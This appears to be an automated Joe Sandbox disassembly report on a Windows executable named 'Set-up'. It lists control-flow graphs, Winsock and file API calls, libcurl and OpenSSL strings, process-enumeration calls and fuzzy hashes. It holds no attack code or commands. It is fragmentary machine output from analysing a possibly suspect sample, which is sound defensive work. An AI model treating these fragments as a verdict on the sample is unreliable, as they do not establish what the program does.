                          control_flow_graph 1112 a98b50-a98b69 1113 a98b6b-a98b74 1112->1113 1114 a98be6 1112->1114 1116 a98beb-a98bf2 1113->1116 1117 a98b76-a98b8d 1113->1117 1115 a98be9 1114->1115 1115->1116 1118 a98b8f-a98ba7 call a76e40 1117->1118 1119 a98bf3-a98bfe call a9a550 1117->1119 1126 a98cd9-a98d16 SleepEx getsockopt 1118->1126 1127 a98bad-a98baf 1118->1127 1124 a98de4-a98def 1119->1124 1125 a98c04-a98c08 1119->1125 1130 a98e8c-a98e95 1124->1130 1131 a98df5-a98e19 call a9a150 WSASetLastError 1124->1131 1132 a98dbd-a98dc3 1125->1132 1133 a98c0e-a98c1d 1125->1133 1128 a98d18-a98d20 WSAGetLastError 1126->1128 1129 a98d22 1126->1129 1134 a98bb5-a98bb9 1127->1134 1135 a98ca6-a98cb0 1127->1135 1136 a98d26-a98d39 1128->1136 1129->1136 1137 a98f00-a98f06 1130->1137 1138 a98e97-a98e9c 1130->1138 1157 a98e88 1131->1157 1158 a98e1b-a98e26 1131->1158 1132->1115 1141 a98c1f-a98c2f connect 1133->1141 1142 a98c35-a98c48 WSAGetLastError call a9a150 1133->1142 1134->1116 1143 a98bbb-a98bc2 1134->1143 1135->1126 1140 a98cb2-a98cb8 1135->1140 1145 a98d3b-a98d3d 1136->1145 1146 a98d43-a98d61 call a7d8c0 call a9a150 1136->1146 1137->1116 1147 a98edf-a98eef call a678b0 1138->1147 1148 a98e9e-a98eb6 call a72a00 1138->1148 1150 a98ddc-a98dde 1140->1150 1151 a98cbe-a98cd4 call a9b180 1140->1151 1141->1142 1161 a98c4d-a98c4f 1142->1161 1143->1116 1144 a98bc4-a98bcc 1143->1144 1153 a98bce-a98bd2 1144->1153 1154 a98bd4-a98bda 1144->1154 1145->1146 1145->1150 1182 a98d66-a98d74 1146->1182 1171 a98ef2-a98efc 1147->1171 1148->1147 1175 a98eb8-a98edd call a73410 * 2 1148->1175 1150->1115 1150->1124 1151->1124 1153->1116 1153->1154 1154->1116 1165 a98bdc-a98be1 1154->1165 1157->1130 1168 a98e28-a98e2c 1158->1168 1169 a98e2e-a98e85 call a7d090 call aa4fd0 1158->1169 1163 a98c8e-a98c93 1161->1163 1164 a98c51-a98c58 1161->1164 1176 a98c99-a98c9f 1163->1176 1177 a98dc8-a98dd9 call a9b100 1163->1177 1164->1163 1172 a98c5a-a98c62 1164->1172 1173 a98dac-a98db8 call aa50a0 1165->1173 1168->1157 1168->1169 1169->1157 1171->1137 1179 a98c6a-a98c70 1172->1179 1180 a98c64-a98c68 1172->1180 1173->1116 1175->1171 1176->1135 1177->1150 1179->1163 1187 a98c72-a98c8b call aa50a0 1179->1187 1180->1163 1180->1179 1182->1116 1189 a98d7a-a98d81 1182->1189 1187->1163 1189->1116 1194 a98d87-a98d8f 1189->1194 1196 a98d9b-a98da1 1194->1196 1197 a98d91-a98d95 1194->1197 1196->1116 1200 a98da7 1196->1200 1197->1116 1197->1196 1200->1173
                          APIs
                          • connect.WS2_32(?,?,00000001), ref: 00A98C2F
                          • WSAGetLastError.WS2_32 ref: 00A98C39
                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00A98CF3
                          • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00A98D0E
                          • WSAGetLastError.WS2_32 ref: 00A98D18
                          • WSASetLastError.WS2_32(00000000), ref: 00A98E0C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast$Sleepconnectgetsockopt
                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                          • API String ID: 2513251565-879669977
                          • Opcode ID: 3e82ae3ea8b4d2300de2a29737642a7ac690363e274279810c8a6c9ac4f4d11e
                          • Instruction ID: 192b0f82a96689ae6dd72f403347bc729bff30c9466d0869b7de3b10fcbcc8eb
                          • Opcode Fuzzy Hash: 3e82ae3ea8b4d2300de2a29737642a7ac690363e274279810c8a6c9ac4f4d11e
                          • Instruction Fuzzy Hash: 2BB1B1707047059FDF20CF24C985BAABBE4AF46314F18852DE8598B2D2DB79EC54C7A2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1341 a676a0-a676be 1342 a676e6-a676f2 send 1341->1342 1343 a676c0-a676c7 1341->1343 1345 a676f4-a67709 call a672a0 1342->1345 1346 a6775e-a67762 1342->1346 1343->1342 1344 a676c9-a676d1 1343->1344 1347 a676d3-a676e4 send 1344->1347 1348 a6770b-a67759 call a672a0 __acrt_iob_func call a6cb20 fflush _errno 1344->1348 1345->1346 1347->1345 1348->1346
                          APIs
                          • send.WS2_32(multi.c,?,?,?), ref: 00A676DE
                          • send.WS2_32(multi.c,?,?,?), ref: 00A676EA
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00A67721
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A67745
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6774D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: send$__acrt_iob_func_errnofflush
                          • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                          • API String ID: 3540913164-3388739168
                          • Opcode ID: 1cbbfb11abc2ab4cec63ce4b7a3fdedc5aba1518c992f963c316ae25eacce3ca
                          • Instruction ID: 74e50536d816715ef96da33afa2b45fd1442ad58aed3b96fe0714244bee93fe5
                          • Opcode Fuzzy Hash: 1cbbfb11abc2ab4cec63ce4b7a3fdedc5aba1518c992f963c316ae25eacce3ca
                          • Instruction Fuzzy Hash: 8511C8B45183446BE530AB65ED4AD7B7BBCEB85B2CF040508F94457341D6A6DD00C7B2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1355 be47b0-be47bf call c3e5d0 1357 be47c4-be47dd strchr 1355->1357 1358 be47df-be47f2 call bdd520 1357->1358 1359 be4824-be485e call c17120 call c17220 GetLastError call c17310 _errno 1357->1359 1365 be488d-be4896 fclose 1358->1365 1366 be47f8-be481f call bdd690 call bddf50 1358->1366 1376 be486b-be488b call c17120 call c17220 1359->1376 1377 be4860-be4869 _errno 1359->1377 1368 be48c2 1365->1368 1372 be48c4-be48cb 1366->1372 1368->1372 1386 be48b8-be48bf call c17310 1376->1386 1377->1376 1378 be4898-be48b3 call c17120 call c17220 1377->1378 1378->1386 1386->1368
                          APIs
                            • Part of subcall function 00C3E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E5E2
                            • Part of subcall function 00C3E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00C3E5FA
                            • Part of subcall function 00C3E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00C3E637
                            • Part of subcall function 00C3E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00BCA31E), ref: 00C3E64D
                            • Part of subcall function 00C3E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00BCA31E,00000001,?,00000008,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000), ref: 00C3E665
                            • Part of subcall function 00C3E5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E678
                            • Part of subcall function 00C3E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E685
                            • Part of subcall function 00C3E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E690
                            • Part of subcall function 00C3E5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BCA31E,?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E), ref: 00C3E6A6
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00FFAB14), ref: 00BE47CC
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00FFAB14), ref: 00BE483D
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00FFAB14), ref: 00BE4855
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00FFAB14), ref: 00BE4860
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00FFAB14), ref: 00BE488E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
                          • String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
                          • API String ID: 3063597995-203430365
                          • Opcode ID: f4c9c538f26d23bd7167688718ba5e28877f441fb64a01d2c8568d039b152996
                          • Instruction ID: cdd0b316faaccf93825101eb6c2bfdaa2fbdf82172033d06823350aba63343b4
                          • Opcode Fuzzy Hash: f4c9c538f26d23bd7167688718ba5e28877f441fb64a01d2c8568d039b152996
                          • Instruction Fuzzy Hash: FE21D3B1F843447AE23032A13C07F6F3AAADF52B58F140165FA4D682C3F6959915B2B3

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
                          • API String ID: 420147892-2059488242
                          • Opcode ID: 3bb2dc4154607fa832d0eb76c8242c4e207c28f8ee105006ff18bc44538f0b43
                          • Instruction ID: f22b42da0ee8246e3797ad7a6341c650655370bab18b65c0fa954a69c51a74c5
                          • Opcode Fuzzy Hash: 3bb2dc4154607fa832d0eb76c8242c4e207c28f8ee105006ff18bc44538f0b43
                          • Instruction Fuzzy Hash: E23194B59093059BCB00EFB8D98569EBBF0AF44314F00886DE898E7341E7349A44DF52
                          APIs
                          • recv.WS2_32(?,?,00A994BF,?), ref: 00A677AE
                          • recv.WS2_32(?,?,00A994BF,?), ref: 00A677BA
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 00A677F1
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A67815
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6781D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: recv$__acrt_iob_func_errnofflush
                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                          • API String ID: 2542159810-640788491
                          • Opcode ID: 78a13fb522a4ec081a1a6493866cb0b47e18a035cf372d9f98de6ae68663955a
                          • Instruction ID: ed34bac62a363283344dc2182b141154e25a385f300944bb9447d02c9133050a
                          • Opcode Fuzzy Hash: 78a13fb522a4ec081a1a6493866cb0b47e18a035cf372d9f98de6ae68663955a
                          • Instruction Fuzzy Hash: 6F1108B45183457BE130AB65AD0AD6B3BBCEBC5F2CF040508F94457341D6A69C00C7F2
                          APIs
                          • socket.WS2_32(?,?,?), ref: 00A67618
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00A67659
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A6767D
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A67685
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: __acrt_iob_func_errnofflushsocket
                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                          • API String ID: 166263346-842387772
                          • Opcode ID: d91ec08c56b511b27ebf75703992a45797a08dd1ec7127ce8aa9daeec0da9370
                          • Instruction ID: 522064897bd825d0855e2c2664be20e2e91284c3a0357981fd461927057e33a4
                          • Opcode Fuzzy Hash: d91ec08c56b511b27ebf75703992a45797a08dd1ec7127ce8aa9daeec0da9370
                          • Instruction Fuzzy Hash: 75115C3561425127D6306B69FC07E9B3FECEF80B38F040114F544962C1D366C850DBE1
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DED1E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno
                          • String ID: @$Inf$NaN
                          • API String ID: 2918714741-141429178
                          • Opcode ID: 01c2e26627bd05405b8c51db6c0fc3b21b6adf647797cd8c7734b99c820b2b6a
                          • Instruction ID: bb85b821c6d5c503068e7656f2c738c5d341630a63f6d8fa008c898b3d5be421
                          • Opcode Fuzzy Hash: 01c2e26627bd05405b8c51db6c0fc3b21b6adf647797cd8c7734b99c820b2b6a
                          • Instruction Fuzzy Hash: E1F1A17060C7C58BD721AF25C4407ABBBE2BB85314F258A2DD9DD87382DB35D905CBA2
                          APIs
                          • WSASetLastError.WS2_32(?), ref: 00A9F75B
                          Strings
                          • %s trying next, xrefs: 00A9F8FE
                          • %s done, xrefs: 00A9F9CD
                          • Connected to %s (%s) port %u, xrefs: 00AA0026
                          • %s connect timeout after %lldms, move on!, xrefs: 00A9FA33
                          • %s connect -> %d, connected=%d, xrefs: 00A9F720
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID: %s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s trying next$Connected to %s (%s) port %u
                          • API String ID: 1452528299-2219341415
                          • Opcode ID: b51350314da9e9d413a7b12f6437b80ca2d55f9aa3d38c2f94c84281f44f94c1
                          • Instruction ID: 86c9b849606d7eed5ec2f1aa3b2978be7a3a3d952fb14d47fb43ee376d02a01f
                          • Opcode Fuzzy Hash: b51350314da9e9d413a7b12f6437b80ca2d55f9aa3d38c2f94c84281f44f94c1
                          • Instruction Fuzzy Hash: DCE18C30704345AFDB24CF29C584B66BBF1BF85318F18C56CE8998B2A2D771E985CB91
                          APIs
                            • Part of subcall function 00A676A0: send.WS2_32(multi.c,?,?,?), ref: 00A676DE
                          • WSAGetLastError.WS2_32 ref: 00A993C3
                            • Part of subcall function 00A7D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00A701B1), ref: 00A7D8E2
                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00A9935C
                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00A99388
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                          • API String ID: 1798382672-2691795271
                          • Opcode ID: c6477a2b523d437ef409730f4dc2b0926603584e5f55c0aeeef24259292bf9a0
                          • Instruction ID: e682ff8be7844d572bf8103650b4ce0c98573bc31e5270a4c8d705e4dbeb7cad
                          • Opcode Fuzzy Hash: c6477a2b523d437ef409730f4dc2b0926603584e5f55c0aeeef24259292bf9a0
                          • Instruction Fuzzy Hash: DB51AD74A00305ABEB11DF28C881FABB7A5FF88314F14852DFD489B282E771E951CB91
                          APIs
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00FC4C2D,00000000,00000000,?,?,?,00B29882,?,00000000), ref: 00B277DD
                          • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00B277F0
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00B27802
                          • GetLastError.KERNEL32(?,00000000), ref: 00B2780E
                          • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 00B27830
